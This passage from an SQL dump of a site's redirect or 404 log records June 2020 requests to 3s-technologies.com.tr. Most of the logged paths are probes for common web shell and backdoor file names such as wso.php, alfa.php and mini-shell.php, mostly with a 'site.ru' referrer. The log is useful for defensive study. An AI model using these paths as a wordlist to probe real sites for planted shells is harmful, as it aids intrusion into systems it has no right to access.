00:00:00',301),(24801,'http://www.3s-technologies.com.tr/tr/nglzmhaeng.html',NULL,'','',1,0,'2020-06-13 14:38:30','0000-00-00 00:00:00',301),(24802,'https://mail.3s-technologies.com.tr/tr/owa/auth/logon.aspx?replacecurrent=1&url=https://mail.3s-technologies.com.tr/owa/',NULL,'','',7,0,'2020-06-13 17:43:58','0000-00-00 00:00:00',301),(24803,'https://3s-technologies.com.tr/tr/owa/auth/logon.aspx?replacecurrent=1&url=https://3s-technologies.com.tr/owa/',NULL,'','',6,0,'2020-06-13 17:44:04','0000-00-00 00:00:00',301),(24804,'http://www.3s-technologies.com.tr/tr/js/admin.js',NULL,'','',1,0,'2020-06-13 23:16:48','0000-00-00 00:00:00',301),(24805,'http://3s-technologies.com.tr/tr/web/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-15 05:33:19','0000-00-00 00:00:00',301),(24806,'http://3s-technologies.com.tr/tr/prov/simple.php5',NULL,'http://site.ru','',2,0,'2020-06-15 05:33:37','0000-00-00 00:00:00',301),(24807,'http://3s-technologies.com.tr/tr/wp-plugins.php',NULL,'http://site.ru','',8,0,'2020-06-15 07:22:51','0000-00-00 00:00:00',301),(24808,'http://3s-technologies.com.tr/tr/cache/simple.php5',NULL,'http://site.ru','',6,0,'2020-06-15 07:22:59','0000-00-00 00:00:00',301),(24809,'http://3s-technologies.com.tr/tr/ruf.php5',NULL,'http://site.ru','',4,0,'2020-06-15 08:46:10','0000-00-00 00:00:00',301),(24810,'http://3s-technologies.com.tr/tr/doc.php',NULL,'http://site.ru','',333,0,'2020-06-15 09:43:19','0000-00-00 00:00:00',301),(24811,'http://3s-technologies.com.tr/tr/cache/blackhat.php.suspected',NULL,'http://site.ru','',8,0,'2020-06-15 10:44:26','0000-00-00 00:00:00',301),(24812,'http://3s-technologies.com.tr/tr/simple.php5.suspected',NULL,'http://site.ru','',8,0,'2020-06-15 11:39:09','0000-00-00 00:00:00',301),(24813,'http://3s-technologies.com.tr/tr/simple.php5.suspected',NULL,'http://site.ru','',1,0,'2020-06-15 11:39:09','0000-00-00 00:00:00',301),(24814,'http://3s-technologies.com.tr/tr/cache/content-post.php.suspected',NULL,'http://site.ru','',6,0,'2020-06-15 12:06:45','0000-00-00 00:00:00',301),(24815,'http://3s-technologies.com.tr/tr/cache/simple.php5.suspected',NULL,'http://site.ru','',8,0,'2020-06-15 12:08:36','0000-00-00 00:00:00',301),(24816,'http://3s-technologies.com.tr/tr/ganks.php.php',NULL,'http://site.ru','',8,0,'2020-06-15 13:02:05','0000-00-00 00:00:00',301),(24817,'http://3s-technologies.com.tr/tr/wp1',NULL,'http://3s-technologies.com.tr/wp1/','',6,0,'2020-06-15 13:35:19','0000-00-00 00:00:00',301),(24818,'http://3s-technologies.com.tr/tr/wp2',NULL,'http://3s-technologies.com.tr/wp2/','',8,0,'2020-06-15 13:35:21','0000-00-00 00:00:00',301),(24819,'http://3s-technologies.com.tr/tr/sito',NULL,'http://3s-technologies.com.tr/sito/','',29,0,'2020-06-15 13:35:24','0000-00-00 00:00:00',301),(24820,'http://3s-technologies.com.tr/tr/2020',NULL,'http://3s-technologies.com.tr/2020/','',35,0,'2020-06-15 13:35:25','0000-00-00 00:00:00',301),(24821,'http://3s-technologies.com.tr/tr/web/simple.php5',NULL,'http://site.ru','',2,0,'2020-06-15 14:24:14','0000-00-00 00:00:00',301),(24822,'http://3s-technologies.com.tr/tr/wp-logs.php',NULL,'http://site.ru','',29,0,'2020-06-15 16:00:27','0000-00-00 00:00:00',301),(24823,'http://3s-technologies.com.tr/tr/administrator/help/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-15 16:27:58','0000-00-00 00:00:00',301),(24824,'http://3s-technologies.com.tr/tr/libraries/pear/archive_tar/mark.php',NULL,'http://site.ru','',3,0,'2020-06-15 16:28:13','0000-00-00 00:00:00',301),(24825,'http://3s-technologies.com.tr/tr/wp-admin/network/sitenets.php5.suspected',NULL,'http://site.ru','',6,0,'2020-06-15 18:18:15','0000-00-00 00:00:00',301),(24826,'http://3s-technologies.com.tr/tr/newsleter.php',NULL,'http://site.ru','',4,0,'2020-06-15 18:44:38','0000-00-00 00:00:00',301),(24827,'http://3s-technologies.com.tr/tr/gank.php.php',NULL,'http://site.ru','',17,0,'2020-06-15 18:44:40','0000-00-00 00:00:00',301),(24828,'http://3s-technologies.com.tr/tr/cache/404.php',NULL,'http://site.ru','',5,0,'2020-06-15 19:10:30','0000-00-00 00:00:00',301),(24829,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/style.php',NULL,'http://site.ru','',2,0,'2020-06-15 19:35:49','0000-00-00 00:00:00',301),(24830,'http://3s-technologies.com.tr/tr/timco-aero.com/cache/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-15 20:02:14','0000-00-00 00:00:00',301),(24831,'http://3s-technologies.com.tr/tr/web/cache/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-15 20:26:59','0000-00-00 00:00:00',301),(24832,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/field/index.php',NULL,'http://site.ru','',6,0,'2020-06-15 20:27:26','0000-00-00 00:00:00',301),(24833,'http://3s-technologies.com.tr/tr/modules/mod_araticlws/mod_atlastic.php',NULL,'http://site.ru','',4,0,'2020-06-15 20:53:39','0000-00-00 00:00:00',301),(24834,'http://3s-technologies.com.tr/tr/web/cache/blackhat.php',NULL,'http://site.ru','',3,0,'2020-06-15 21:19:26','0000-00-00 00:00:00',301),(24835,'http://3s-technologies.com.tr/tr/assets/images/simple.php5',NULL,'http://site.ru','',1,0,'2020-06-15 21:20:22','0000-00-00 00:00:00',301),(24836,'http://3s-technologies.com.tr/tr/lux.php',NULL,'http://site.ru','',9,0,'2020-06-15 22:12:20','0000-00-00 00:00:00',301),(24837,'http://www.3s-technologies.com.tr/tr/install/js/install.js',NULL,'','',2,0,'2020-06-16 00:25:10','0000-00-00 00:00:00',301),(24838,'http://3s-technologies.com.tr/tr/libraries/joomla/template/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-16 04:09:09','0000-00-00 00:00:00',301),(24839,'http://3s-technologies.com.tr/tr/cache/wp-defence.php',NULL,'http://site.ru','',1,0,'2020-06-16 04:37:16','0000-00-00 00:00:00',301),(24840,'http://3s-technologies.com.tr/tr/libraries/joomla/template/wp-cofigs.php',NULL,'http://site.ru','',3,0,'2020-06-16 05:31:01','0000-00-00 00:00:00',301),(24841,'http://3s-technologies.com.tr/tr/cache/wp-plugins.php',NULL,'http://site.ru','',5,0,'2020-06-16 06:53:59','0000-00-00 00:00:00',301),(24842,'http://3s-technologies.com.tr/tr/xixi.php',NULL,'http://site.ru','',1,0,'2020-06-16 07:20:55','0000-00-00 00:00:00',301),(24843,'http://3s-technologies.com.tr/tr/components/com_k2/helpers/drop.php',NULL,'http://site.ru','',1,0,'2020-06-16 10:23:55','0000-00-00 00:00:00',301),(24844,'http://3s-technologies.com.tr/tr/assets/images/doc.php',NULL,'http://site.ru','',68,0,'2020-06-16 10:48:47','0000-00-00 00:00:00',301),(24845,'http://3s-technologies.com.tr/tr/components/com_content/green.php',NULL,'http://site.ru','',4,0,'2020-06-16 13:32:54','0000-00-00 00:00:00',301),(24846,'http://3s-technologies.com.tr/tr/r.php',NULL,'http://site.ru','',111,0,'2020-06-16 14:41:23','0000-00-00 00:00:00',301),(24847,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/styles.php',NULL,'http://site.ru','',2,0,'2020-06-16 15:34:57','0000-00-00 00:00:00',301),(24848,'http://3s-technologies.com.tr/tr/alfa.php',NULL,'http://site.ru','',642,0,'2020-06-16 15:35:36','0000-00-00 00:00:00',301),(24849,'http://3s-technologies.com.tr/tr/components/com_banners/helpers/images.php',NULL,'http://site.ru','',3,0,'2020-06-16 16:44:53','0000-00-00 00:00:00',301),(24850,'http://3s-technologies.com.tr/tr/assets/global/plugins/plupload/examples/upload.php',NULL,'http://www.google.com/','',8,0,'2020-06-16 16:53:41','0000-00-00 00:00:00',301),(24851,'http://3s-technologies.com.tr/tr/assets/plugins/plupload/examples/upload.php',NULL,'http://www.google.com/','',7,0,'2020-06-16 16:53:41','0000-00-00 00:00:00',301),(24852,'http://3s-technologies.com.tr/tr/assets/plupload/examples/upload.php',NULL,'http://www.google.com/','',4,0,'2020-06-16 16:53:42','0000-00-00 00:00:00',301),(24853,'http://3s-technologies.com.tr/tr/components/com_jnews/includes/openflashchart/tmp-upload-images/sittir.php',NULL,'http://site.ru','',3,0,'2020-06-16 18:09:59','0000-00-00 00:00:00',301),(24854,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/w.php',NULL,'http://site.ru','',5,0,'2020-06-16 18:10:24','0000-00-00 00:00:00',301),(24855,'http://3s-technologies.com.tr/tr/seter.php',NULL,'http://site.ru','',3,0,'2020-06-16 18:45:18','0000-00-00 00:00:00',301),(24856,'http://3s-technologies.com.tr/tr/wp-console.php',NULL,'http://site.ru','',4,0,'2020-06-16 18:45:36','0000-00-00 00:00:00',301),(24857,'http://3s-technologies.com.tr/tr/images/wp-img.php',NULL,'http://site.ru','',2,0,'2020-06-16 18:45:47','0000-00-00 00:00:00',301),(24858,'http://3s-technologies.com.tr/tr/plugins/content/upgrade.php',NULL,'http://site.ru','',4,0,'2020-06-16 19:18:45','0000-00-00 00:00:00',301),(24859,'http://3s-technologies.com.tr/tr/meta.php',NULL,'http://site.ru','',54,0,'2020-06-16 19:19:20','0000-00-00 00:00:00',301),(24860,'http://3s-technologies.com.tr/tr/list.php',NULL,'http://site.ru','',5,0,'2020-06-16 19:51:25','0000-00-00 00:00:00',301),(24861,'http://3s-technologies.com.tr/tr/includes/404.php',NULL,'http://site.ru','',4,0,'2020-06-16 19:56:47','0000-00-00 00:00:00',301),(24862,'http://3s-technologies.com.tr/tr/ghjk.php',NULL,'http://site.ru','',2,0,'2020-06-16 20:27:13','0000-00-00 00:00:00',301),(24863,'http://3s-technologies.com.tr/tr/administrator/templates/isis/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-16 21:01:35','0000-00-00 00:00:00',301),(24864,'http://3s-technologies.com.tr/tr/templates/protostar/simple.php5.suspected',NULL,'http://site.ru','',2,0,'2020-06-16 21:37:05','0000-00-00 00:00:00',301),(24865,'http://3s-technologies.com.tr/tr/templates/beez3/simple.php5.suspected',NULL,'http://site.ru','',2,0,'2020-06-16 21:37:15','0000-00-00 00:00:00',301),(24866,'http://3s-technologies.com.tr/tr/images/wso.php',NULL,'http://site.ru','',5,0,'2020-06-16 22:11:37','0000-00-00 00:00:00',301),(24867,'http://3s-technologies.com.tr/tr/dontme.php',NULL,'http://site.ru','',4,0,'2020-06-16 22:11:47','0000-00-00 00:00:00',301),(24868,'http://3s-technologies.com.tr/tr/wp-content/uploads/ix.php.php',NULL,'http://site.ru','',1,0,'2020-06-16 22:46:36','0000-00-00 00:00:00',301),(24869,'http://3s-technologies.com.tr/tr/cache/sim5.php',NULL,'http://site.ru','',4,0,'2020-06-16 22:46:53','0000-00-00 00:00:00',301),(24870,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/r.php',NULL,'http://site.ru','',2,0,'2020-06-17 01:05:44','0000-00-00 00:00:00',301),(24871,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/.libs.up.php.i',NULL,'http://site.ru','',4,0,'2020-06-17 01:05:52','0000-00-00 00:00:00',301),(24872,'http://3s-technologies.com.tr/tr/media/mailto/0x.php',NULL,'http://site.ru','',1,0,'2020-06-17 06:17:09','0000-00-00 00:00:00',301),(24873,'http://3s-technologies.com.tr/tr/templates/protostar/simple.php5',NULL,'http://site.ru','',2,0,'2020-06-17 06:17:21','0000-00-00 00:00:00',301),(24874,'http://3s-technologies.com.tr/tr/components/com_content/wso3.php',NULL,'http://site.ru','',1,0,'2020-06-17 06:18:08','0000-00-00 00:00:00',301),(24875,'http://3s-technologies.com.tr/tr/anu.php',NULL,'http://site.ru','',4,0,'2020-06-17 07:25:42','0000-00-00 00:00:00',301),(24876,'http://3s-technologies.com.tr/tr/language/overrides/legacy38266.php',NULL,'http://site.ru','',1,0,'2020-06-17 07:55:57','0000-00-00 00:00:00',301),(24877,'http://3s-technologies.com.tr/tr/administrator/wp-info.php',NULL,'http://site.ru','',1,0,'2020-06-17 07:56:08','0000-00-00 00:00:00',301),(24878,'http://3s-technologies.com.tr/tr/modules/mod_acepolls/helper.php',NULL,'http://site.ru','',2,0,'2020-06-17 07:56:11','0000-00-00 00:00:00',301),(24879,'http://www.3s-technologies.com.tr/tr/admin/index.php?route=common/login',NULL,'','',2,0,'2020-06-17 16:10:28','0000-00-00 00:00:00',301),(24880,'https://www.3s-technologies.com.tr/tr/.jpg',NULL,'https://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/screen-printer/spr-20-41-42-detail?tmpl=component','',14,0,'2020-06-17 16:11:27','0000-00-00 00:00:00',301),(24881,'http://3s-technologies.com.tr/tr/_1_administrator/edit/wertr6.php',NULL,'http://site.ru','',1,0,'2020-06-17 18:33:43','0000-00-00 00:00:00',301),(24882,'http://3s-technologies.com.tr/tr/templates/system/html/index.php',NULL,'http://site.ru','',1,0,'2020-06-17 19:06:18','0000-00-00 00:00:00',301),(24883,'http://3s-technologies.com.tr/tr/hx.php',NULL,'http://site.ru','',2,0,'2020-06-17 19:06:26','0000-00-00 00:00:00',301),(24884,'http://3s-technologies.com.tr/tr/modules/mod_carramba/hours.php',NULL,'http://site.ru','',2,0,'2020-06-17 19:37:37','0000-00-00 00:00:00',301),(24885,'http://3s-technologies.com.tr/tr/nta.php',NULL,'http://site.ru','',3,0,'2020-06-17 19:37:55','0000-00-00 00:00:00',301),(24886,'http://3s-technologies.com.tr/tr/cache/wp-info.php',NULL,'http://site.ru','',3,0,'2020-06-17 19:41:32','0000-00-00 00:00:00',301),(24887,'http://3s-technologies.com.tr/tr/administrator/ganks.php.php',NULL,'http://site.ru','',1,0,'2020-06-17 19:51:06','0000-00-00 00:00:00',301),(24888,'http://3s-technologies.com.tr/tr/libraries/phputf8/native/mark.php',NULL,'http://site.ru','',3,0,'2020-06-17 20:09:11','0000-00-00 00:00:00',301),(24889,'http://3s-technologies.com.tr/tr/administrator/components/com_ganalytics/libraries/jquery/class-wp-filesystemss.php',NULL,'http://site.ru','',3,0,'2020-06-17 20:09:39','0000-00-00 00:00:00',301),(24890,'http://3s-technologies.com.tr/tr/modules/logs.php',NULL,'http://site.ru','',2,0,'2020-06-17 20:09:52','0000-00-00 00:00:00',301),(24891,'http://3s-technologies.com.tr/tr/user/register',NULL,'','',1,0,'2020-06-17 20:34:04','0000-00-00 00:00:00',301),(24892,'http://3s-technologies.com.tr/tr/sheeel.php',NULL,'http://site.ru','',2,0,'2020-06-17 21:13:45','0000-00-00 00:00:00',301),(24893,'http://3s-technologies.com.tr/tr/shoes.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-17 21:45:23','0000-00-00 00:00:00',301),(24894,'http://3s-technologies.com.tr/tr/wso2.php.suspected',NULL,'http://site.ru','',4,0,'2020-06-17 21:45:24','0000-00-00 00:00:00',301),(24895,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/controllers/class.php',NULL,'http://site.ru','',4,0,'2020-06-17 22:48:06','0000-00-00 00:00:00',301),(24896,'http://3s-technologies.com.tr/tr/plugins/content/apismtp/vzadri.php',NULL,'http://site.ru','',3,0,'2020-06-17 22:48:12','0000-00-00 00:00:00',301),(24897,'http://3s-technologies.com.tr/tr/images/al.php.phpgif',NULL,'http://site.ru','',3,0,'2020-06-17 22:48:24','0000-00-00 00:00:00',301),(24898,'http://3s-technologies.com.tr/tr/components/com_banners/helpers/class.php',NULL,'http://site.ru','',3,0,'2020-06-17 23:51:35','0000-00-00 00:00:00',301),(24899,'http://3s-technologies.com.tr/tr/salim.php',NULL,'http://site.ru','',2,0,'2020-06-18 00:55:15','0000-00-00 00:00:00',301),(24900,'http://3s-technologies.com.tr/tr/components/com_weblinks/views/404.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-18 00:56:17','0000-00-00 00:00:00',301),(24901,'http://3s-technologies.com.tr/tr/components/com_foxcontact/sad.php',NULL,'http://site.ru','',1,0,'2020-06-18 01:58:41','0000-00-00 00:00:00',301),(24902,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/sql/updates/postgresql/ix.php.php',NULL,'http://site.ru','',1,0,'2020-06-18 02:30:02','0000-00-00 00:00:00',301),(24903,'http://3s-technologies.com.tr/tr/libraries/pear/archive_tar/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-18 02:30:51','0000-00-00 00:00:00',301),(24904,'http://3s-technologies.com.tr/tr/libraries/joomla/template/123.php',NULL,'http://site.ru','',1,0,'2020-06-18 05:30:31','0000-00-00 00:00:00',301),(24905,'http://3s-technologies.com.tr/tr/master.php',NULL,'http://site.ru','',4,0,'2020-06-18 05:30:32','0000-00-00 00:00:00',301),(24906,'http://3s-technologies.com.tr/tr/libraries/joomla/template/ash.php',NULL,'http://site.ru','',2,0,'2020-06-18 05:30:38','0000-00-00 00:00:00',301),(24907,'http://3s-technologies.com.tr/tr/wp-content.php',NULL,'http://site.ru','',33,0,'2020-06-18 05:58:38','0000-00-00 00:00:00',301),(24908,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/style.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-18 05:58:46','0000-00-00 00:00:00',301),(24909,'http://3s-technologies.com.tr/tr/includes/wp-info.php',NULL,'http://site.ru','',3,0,'2020-06-18 05:59:08','0000-00-00 00:00:00',301),(24910,'http://3s-technologies.com.tr/tr/media/editors/tinymce/plugins/noneditable/img.php',NULL,'http://site.ru','',1,0,'2020-06-18 06:54:32','0000-00-00 00:00:00',301),(24911,'http://3s-technologies.com.tr/tr/media/lux.php',NULL,'http://site.ru','',1,0,'2020-06-18 06:54:56','0000-00-00 00:00:00',301),(24912,'http://3s-technologies.com.tr/tr/templates/hotel/cnn.php',NULL,'http://site.ru','',1,0,'2020-06-18 06:55:08','0000-00-00 00:00:00',301),(24913,'http://3s-technologies.com.tr/tr/conf.php',NULL,'http://site.ru','',9,0,'2020-06-18 08:48:10','0000-00-00 00:00:00',301),(24914,'http://3s-technologies.com.tr/tr/components/com_foxcontact/kd.php',NULL,'http://site.ru','',1,0,'2020-06-18 09:15:38','0000-00-00 00:00:00',301),(24915,'http://3s-technologies.com.tr/tr/__macosx/templates/protostar/html/layouts/joomla/form/field/simpleside.php5',NULL,'http://site.ru','',2,0,'2020-06-18 09:43:12','0000-00-00 00:00:00',301),(24916,'http://3s-technologies.com.tr/tr/administrator/templates/isis/simple.php5',NULL,'http://site.ru','',3,0,'2020-06-18 10:17:03','0000-00-00 00:00:00',301),(24917,'http://3s-technologies.com.tr/tr/components/com_foxcontact/misel.php',NULL,'http://site.ru','',1,0,'2020-06-18 10:36:51','0000-00-00 00:00:00',301),(24918,'http://3s-technologies.com.tr/tr/res.php',NULL,'http://site.ru','',7,0,'2020-06-18 11:30:00','0000-00-00 00:00:00',301),(24919,'http://3s-technologies.com.tr/tr/rois.php',NULL,'http://site.ru','',7,0,'2020-06-18 11:30:49','0000-00-00 00:00:00',301),(24920,'http://3s-technologies.com.tr/tr/layouts/libraries/cms/alfav3.php',NULL,'http://site.ru','',1,0,'2020-06-18 11:55:44','0000-00-00 00:00:00',301),(24921,'http://3s-technologies.com.tr/tr/modules/mod_insider/ganks.php.php',NULL,'http://site.ru','',2,0,'2020-06-18 12:22:23','0000-00-00 00:00:00',301),(24922,'http://3s-technologies.com.tr/tr/images/headers/indeh.php',NULL,'http://site.ru','',1,0,'2020-06-18 12:49:00','0000-00-00 00:00:00',301),(24923,'http://3s-technologies.com.tr/tr/layouts/plugins/user/terms/class-wp-filesystemss.php',NULL,'http://site.ru','',1,0,'2020-06-18 13:14:42','0000-00-00 00:00:00',301),(24924,'http://3s-technologies.com.tr/tr/neter.php.suspected',NULL,'http://site.ru','',4,0,'2020-06-18 13:15:08','0000-00-00 00:00:00',301),(24925,'http://3s-technologies.com.tr/tr/fx.php',NULL,'http://site.ru','',95,0,'2020-06-18 13:15:23','0000-00-00 00:00:00',301),(24926,'http://3s-technologies.com.tr/en/cache/blackhat.php',NULL,'','',3,0,'2020-06-18 18:12:05','0000-00-00 00:00:00',301),(24927,'http://3s-technologies.com.tr/tr/cli/db2.php',NULL,'http://site.ru','',4,0,'2020-06-19 05:55:38','0000-00-00 00:00:00',301),(24928,'http://3s-technologies.com.tr/tr/templates/atomic/ganks.php.php',NULL,'http://site.ru','',1,0,'2020-06-19 07:38:03','0000-00-00 00:00:00',301),(24929,'http://3s-technologies.com.tr/tr/sax.php',NULL,'http://site.ru','',2,0,'2020-06-19 08:30:50','0000-00-00 00:00:00',301),(24930,'http://3s-technologies.com.tr/tr/webstat/wp-info.php',NULL,'http://site.ru','',1,0,'2020-06-19 08:57:00','0000-00-00 00:00:00',301),(24931,'http://3s-technologies.com.tr/tr/administrator/templates/system/simpleside.php5',NULL,'http://site.ru','',1,0,'2020-06-19 09:22:45','0000-00-00 00:00:00',301),(24932,'http://3s-technologies.com.tr/tr/templates/protostar/language/pm.php',NULL,'http://site.ru','',2,0,'2020-06-19 09:49:31','0000-00-00 00:00:00',301),(24933,'http://3s-technologies.com.tr/tr/small.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-19 10:15:00','0000-00-00 00:00:00',301),(24934,'http://3s-technologies.com.tr/tr/templates/wp-info.php',NULL,'http://site.ru','',1,0,'2020-06-19 10:46:08','0000-00-00 00:00:00',301),(24935,'http://3s-technologies.com.tr/tr/layouts/wp-info.php',NULL,'http://site.ru','',2,0,'2020-06-19 11:08:08','0000-00-00 00:00:00',301),(24936,'http://3s-technologies.com.tr/tr/404.php.suspected',NULL,'http://site.ru','',4,0,'2020-06-19 11:08:21','0000-00-00 00:00:00',301),(24937,'http://3s-technologies.com.tr/tr/components/404.php',NULL,'http://site.ru','',2,0,'2020-06-19 11:08:46','0000-00-00 00:00:00',301),(24938,'http://3s-technologies.com.tr/tr/layouts/joomla/system/mark.php',NULL,'http://site.ru','',1,0,'2020-06-19 11:34:10','0000-00-00 00:00:00',301),(24939,'http://3s-technologies.com.tr/tr/modules/mod_carramba/shoes.php',NULL,'http://site.ru','',1,0,'2020-06-19 11:59:37','0000-00-00 00:00:00',301),(24940,'http://3s-technologies.com.tr/tr/vz.php',NULL,'http://site.ru','',4,0,'2020-06-19 12:00:28','0000-00-00 00:00:00',301),(24941,'http://3s-technologies.com.tr/tr/includes/dcomay.php',NULL,'http://site.ru','',1,0,'2020-06-19 12:26:21','0000-00-00 00:00:00',301),(24942,'http://3s-technologies.com.tr/tr/libraries/phputf8/native/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-06-19 12:52:18','0000-00-00 00:00:00',301),(24943,'http://3s-technologies.com.tr/tr/logs/data.php',NULL,'http://site.ru','',2,0,'2020-06-19 12:52:30','0000-00-00 00:00:00',301),(24944,'http://3s-technologies.com.tr/tr/libraries/pear/archive_tar/popup-pomo.php',NULL,'http://site.ru','',3,0,'2020-06-19 14:12:11','0000-00-00 00:00:00',301),(24945,'http://3s-technologies.com.tr/tr/modules/mod_fxprev/libraries/wp-console.php',NULL,'http://site.ru','',1,0,'2020-06-19 14:37:15','0000-00-00 00:00:00',301),(24946,'http://3s-technologies.com.tr/tr/components/com_contact/index.php',NULL,'http://site.ru','',4,0,'2020-06-19 15:03:32','0000-00-00 00:00:00',301),(24947,'http://3s-technologies.com.tr/tr/freshrdp.com2.php',NULL,'http://site.ru','',3,0,'2020-06-19 15:29:12','0000-00-00 00:00:00',301),(24948,'http://3s-technologies.com.tr/tr/home.php',NULL,'http://site.ru','',31,0,'2020-06-19 15:30:18','0000-00-00 00:00:00',301),(24949,'http://3s-technologies.com.tr/tr/modules/mod_fxprev/libraries/content-post.php',NULL,'http://site.ru','',3,0,'2020-06-19 16:21:23','0000-00-00 00:00:00',301),(24950,'http://3s-technologies.com.tr/tr/wp-crons.php',NULL,'http://site.ru','',24,0,'2020-06-19 16:46:28','0000-00-00 00:00:00',301),(24951,'http://3s-technologies.com.tr/tr/um0six6/mini-shell.php',NULL,'http://site.ru','',3,0,'2020-06-19 17:12:07','0000-00-00 00:00:00',301),(24952,'http://3s-technologies.com.tr/tr/images/wp-info.php',NULL,'http://site.ru','',3,0,'2020-06-19 17:13:04','0000-00-00 00:00:00',301),(24953,'http://3s-technologies.com.tr/tr/tlnehbrubo.php',NULL,'http://site.ru','',3,0,'2020-06-19 17:38:17','0000-00-00 00:00:00',301),(24954,'http://3s-technologies.com.tr/tr/language/404.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-19 17:44:34','0000-00-00 00:00:00',301),(24955,'http://3s-technologies.com.tr/tr/components/com_foxcontact/mini.php',NULL,'http://site.ru','',4,0,'2020-06-19 18:04:06','0000-00-00 00:00:00',301),(24956,'http://3s-technologies.com.tr/tr/bypass.php',NULL,'http://site.ru','',200,0,'2020-06-19 18:04:11','0000-00-00 00:00:00',301),(24957,'http://3s-technologies.com.tr/tr/templates/beez3/ganks.php.php',NULL,'http://site.ru','',1,0,'2020-06-19 18:04:12','0000-00-00 00:00:00',301),(24958,'http://3s-technologies.com.tr/tr/plugins/user/profile/ganks.php.php',NULL,'http://site.ru','',1,0,'2020-06-19 18:04:19','0000-00-00 00:00:00',301),(24959,'http://3s-technologies.com.tr/tr/language/en-gb/en-gb.php',NULL,'http://site.ru','',3,0,'2020-06-19 20:15:04','0000-00-00 00:00:00',301),(24960,'http://3s-technologies.com.tr/tr/plugins/content/upgrade/upgrade.php',NULL,'http://site.ru','',4,0,'2020-06-19 20:15:10','0000-00-00 00:00:00',301),(24961,'http://3s-technologies.com.tr/tr/administrator/search.class.php',NULL,'http://site.ru','',2,0,'2020-06-20 00:46:30','0000-00-00 00:00:00',301),(24962,'http://3s-technologies.com.tr/tr/components/com_phocaphoto/views/image/simpleside.php5.suspected',NULL,'http://site.ru','',1,0,'2020-06-20 03:32:07','0000-00-00 00:00:00',301),(24963,'http://3s-technologies.com.tr/tr/libraries/joomla/template/wp-cofigs.php.suspected',NULL,'http://site.ru','',7,0,'2020-06-20 03:58:14','0000-00-00 00:00:00',301),(24964,'http://3s-technologies.com.tr/tr/plugins/wp-info.php',NULL,'http://site.ru','',2,0,'2020-06-20 04:23:57','0000-00-00 00:00:00',301),(24965,'http://3s-technologies.com.tr/tr/administrator/gank.php.php',NULL,'http://site.ru','',2,0,'2020-06-20 04:24:17','0000-00-00 00:00:00',301),(24966,'http://3s-technologies.com.tr/tr/yusa.php',NULL,'http://site.ru','',6,0,'2020-06-20 04:52:05','0000-00-00 00:00:00',301),(24967,'http://3s-technologies.com.tr/tr/media/bb.php',NULL,'http://site.ru','',2,0,'2020-06-20 05:20:46','0000-00-00 00:00:00',301),(24968,'http://3s-technologies.com.tr/tr/components/com_tabulizer/assets/js/responsive/bag.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-20 06:13:57','0000-00-00 00:00:00',301),(24969,'http://3s-technologies.com.tr/tr/alf.php',NULL,'http://site.ru','',53,0,'2020-06-20 06:42:39','0000-00-00 00:00:00',301),(24970,'http://3s-technologies.com.tr/tr/administrator/components/com_actionlogs/layouts/gank.php.php',NULL,'http://site.ru','',1,0,'2020-06-20 07:09:13','0000-00-00 00:00:00',301),(24971,'http://3s-technologies.com.tr/tr/components/com_foxcontact/0byte.php',NULL,'http://site.ru','',1,0,'2020-06-20 07:10:53','0000-00-00 00:00:00',301),(24972,'http://3s-technologies.com.tr/tr/plugins/system/legacy/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-20 08:32:57','0000-00-00 00:00:00',301),(24973,'http://3s-technologies.com.tr/tr/cache/ghjk.php',NULL,'http://site.ru','',1,0,'2020-06-20 19:40:04','0000-00-00 00:00:00',301),(24974,'http://www.3s-technologies.com.tr/tr/public/js/image.js',NULL,'','',1,0,'2020-06-21 00:56:05','0000-00-00 00:00:00',301),(24975,'http://3s-technologies.com.tr/tr/wsi.php',NULL,'http://site.ru','',2,0,'2020-06-21 04:21:48','0000-00-00 00:00:00',301),(24976,'http://3s-technologies.com.tr/tr/administrator/components/com_mapyandex/assets/images/deficon/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-21 04:22:08','0000-00-00 00:00:00',301),(24977,'http://3s-technologies.com.tr/tr/ganks.php.php.suspected',NULL,'http://site.ru','',5,0,'2020-06-21 05:15:12','0000-00-00 00:00:00',301),(24978,'http://3s-technologies.com.tr/tr/administrator/components/com_imageshow/language/admin/fr-fr/htaccess.php',NULL,'http://site.ru','',4,0,'2020-06-21 05:40:49','0000-00-00 00:00:00',301),(24979,'http://3s-technologies.com.tr/tr/cache/wp-plugins.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-21 05:41:19','0000-00-00 00:00:00',301),(24980,'http://3s-technologies.com.tr/tr/components/com_banners/models/images.php',NULL,'http://site.ru','',3,0,'2020-06-21 05:42:33','0000-00-00 00:00:00',301),(24981,'http://www.3s-technologies.com.tr/tr/wp-includes/css/css.php',NULL,'','',2,0,'2020-06-21 06:04:48','0000-00-00 00:00:00',301),(24982,'http://www.3s-technologies.com.tr/tr/wp-1ogin_bak.php',NULL,'','',1,0,'2020-06-21 06:04:56','0000-00-00 00:00:00',301),(24983,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/plugins/greengo.php',NULL,'','',1,0,'2020-06-21 06:05:01','0000-00-00 00:00:00',301),(24984,'http://3s-technologies.com.tr/tr/shx.php',NULL,'http://site.ru','',82,0,'2020-06-21 06:06:07','0000-00-00 